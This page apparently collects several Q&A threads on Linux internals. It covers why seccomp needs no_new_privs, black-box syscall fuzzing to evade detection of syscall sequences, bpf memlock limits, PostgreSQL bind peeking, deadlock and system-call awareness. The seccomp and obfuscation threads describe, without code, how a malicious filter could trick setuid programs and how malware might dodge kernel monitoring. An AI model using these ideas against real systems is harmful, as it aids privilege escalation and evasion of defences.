Why no_new_privs bit is required with seccomp? example of theoretical exploit - privileges

I've seen that before using seccomp mode filter you have to set this bit, because it guarantees that a child process can't be executed with greater privileges compared to the parent's ones. But still I can't figure out an exploitation example. Could you show me one?
THEORETICAL SCENARIO: I have a program which can set seccomp filter mode without set no_new_privs bit.
GOAL: show a program which exploits it
This requirement ensures that an
unprivileged process cannot apply a malicious filter and then
invoke a set-user-ID or other privileged program using
execve(2), thus potentially compromising that program. (Such
a malicious filter might, for example, cause an attempt to use
setuid(2) to set the caller's user IDs to nonzero values to
instead return 0 without actually making the system call.
Thus, the program might be tricked into retaining superuser
privileges in circumstances where it is possible to influence
it to do dangerous things because it did not actually drop
privileges.)

Related

For black-box analysis of the outcome of a system call, is a complete comparison of before-and-after forensic system images the right way to measure?

I'm doing x86-64 binary obfuscation research and fundamentally one of the key challenges in the offense / defense cat and mouse game of executing a known-bad program and detecting it (even when obfuscated) is system call sequence analysis.
Put simply, obfuscation is just achieving the same effects on the system through a different sequence of instructions and memory states in order to minimize observable analysis channels. But at the end of the day, you need to execute certain system calls in a certain order to achieve certain input / output behaviors for a program.
Or do you? The question I want to study is this: Could the intended outcome of some or all system calls be achieved through different system calls? Let's say system call D, when executed 3 times consecutively, with certain parameters can be heuristically attributed to malicious behavior. If system calls A, B, and C could be found to achieve the same effect (perhaps in addition to other side-effects) desired from system call D, then it would be possible to evade kernel hooks designed to trace and heuristically analyze system call sequences.
To determine how often this system call outcome overlap exists in a given OS, I don't want to use documentation and manual analysis for a few reasons:
undocumented behavior
lots of work, repeated for every OS and even different versions
So rather, I'm interested in performing black-box analysis to fuzz system calls with various arguments and observing the effects. My problem is I'm not sure how to measure the effects. Once I execute a system call, what mechanism could I use to observe exactly which changes result from it? Is there any reliable way, aside from completely iterating over entire forensic snapshots of the machine before and after?

bpf resource limit using setrlimit

When writing bpf programs, some online tutorials always use
struct rlimit rlim_new = {
.rlim_cur = RLIM_INFINITY,
.rlim_max = RLIM_INFINITY,
};
setrlimit(RLIMIT_MEMLOCK, &rlim_new);
to remove memory usage limitation for the bpf programs. This makes the program require root privilege. I wonder if there is something equivalent that does not require root privilege.
Thanks,
Peng.
Not possible
From man setrlimit:
The getrlimit() and setrlimit() system calls get and set resource limits respectively. Each resource has an associated soft and hard limit, as defined by the rlimit structure:
struct rlimit {
rlim_t rlim_cur; /* Soft limit */
rlim_t rlim_max; /* Hard limit (ceiling for rlim_cur) */
};
The soft limit is the value that the kernel enforces for the corresponding resource. The hard limit acts as a ceiling for the soft limit: an unprivileged process may only set its soft limit to a value in the range from 0 up to the hard limit, and (irreversibly) lower its hard limit. A privileged process (under Linux: one with the CAP_SYS_RESOURCE capability) may make arbitrary changes to either limit value.
As you can read, a non-root process (or rather, without the relevant capacity) can only lower its memory limit. This answers your question: There is no equivalent for unprivileged users. Which makes sense, because the purpose of the memory limit is to prevent unprivileged users to harm the system in the first place, and allowing them to bypass the limit would kind of defeat that objective.
Seldom an issue
It is usually not an issue, because most eBPF-related operations require some privileges anyway. It used to be CAP_SYS_ADMIN, it is now a combination of CAP_SYS_ADMIN, CAP_BPF, CAP_NET_ADMIN, CAP_PEFMON depending on the program types and features used. One notable exception are eBPF programs attached to network sockets, which may be attached without privileges, if the kernel.unprivileged_bpf_disabled control knob has been set accordingly and if the program does not use forbidden features, see also this answer.
About to change
Note also that the memory accounting for eBPF objects is changing, and newer kernels (starting with 5.11) will use cgroup-based memory usage, so the call to setrlimit() for eBPF objects will become obsolete.

Parameter sniffing / bind peeking in PostgresSQL

The Prepare and Execute combination in PostgreSQL permit the use of bound parameters. However, Prepare does not produce a plan optimized for one set of parameter bindings that can be reused with a different set of parameters bindings. Does anybody have pointers on implementing such functionality? With this, the plan would be optimized for the given set of parameter bindings but could be reused for another set. The plan might not be efficient for the subsequent set, but if the plan cost was recomputed using the new parameter bindings, it might be found to be efficient.
Reading and using parameter binding values for cardinality estimation is called "parameter sniffing" in SQL Server and "bind peeking" in Oracle. Basically, has anybody done anything similar in PostgreSQL.
PostgreSQL uses a heuristic to decide whether to do "bind peeking". It does peeking the first 5 times (I think it is) that a prepared statement is executed, and if none of those lead to better (expected-to-be-better) plans than the generic plan was, it stops checking in the future.
Starting in v12, you can change this heuristic by setting plan_cache_mode.
Note that some drivers implement their own heuristics--just because you call the driver's prepare method doesn't mean it actually transmits this to the server as a PREPARE. It might instead stash the statement text away, wait until you execute, and then quote/escape your parameters and bundle them up with your previously pseudo-prepared statement and send them to the server in one packet. That is, they might treat the prepare/execute separation simply as a way to prevent SQL injections, not as a way to increase performance.

Operating System Deadlock

I have a confusion in deadlock avoidance technique.
Could we achieve the deadlock avoidance by adding more number of resources?a)Yes
b)No
Deadlock does not equal deadlock, you have to be more specific. For a "classical" deadlock as described in books (two processes trying to access both the screen and the printer at the same time) adding resources does not count as option, because the process needs those specific resources.
Of course, in this example, adding another printer would solve the deadlock. But to be extensible to software development, where a "resource" is something more abstract, like the access to a certain variable, adding resources is not considered a valid option. If two processes need to share access to a variable, it is not possible to introduce another without changing the behavior of the program.

Importance of knowing if a standard library function is executing a system call

Is it actually important for a programmer to know if the standard library function he/she is using is actually executing a system call? If so, why?
Intuitively I'm guessing the only importance is in knowing if the general standard function is a library function or a system call itself. In other cases, I'm guessing there isn't much of a need to know if a library functions uses internally a system call?
It is not always possible to know (for sure) if a library function wraps a system call. But in one way or another, this knowledge can help improve the portability and (or) efficiency of your program. At least in the following two cases, knowing the syscall-level behaviours of your program is helpful.
When your program is time critical. Some system calls are expensive, and the library functions that wrap them are even more expensive. Thus time-critical tasks may need to switch to equivalent functions that do not enter kernel space at all.
It is also worth noticing the vsyscall (or vdso) mechanism of linux, which accelerates some system calls (i.e. gettimeofday) through mapping their implementations into user-space memory. See this for more details.
When your program needs to be deployed to some restricted environments with system call auditing. In order for your programs to survive such environments, it could be necessary to profile your program for any potential policy violations, or perhaps less tough if you are aware of the restrictions when you wrote the program.
Sometimes it might be important, and sometimes it isn't. I don't think there's any universal answer to this question. Reasons I can think of that might be important in some contexts are: if the system call requires user permissions that the user might not have; in performance critical code a system call might be too heavyweight; if you're writing a signal-handler where most system calls are forbidden; if it might use some system resource (e.g. reading from /dev/random for every random number could use up the whole entropy pool - you'd want to know if that's going to happen every time you call rand()).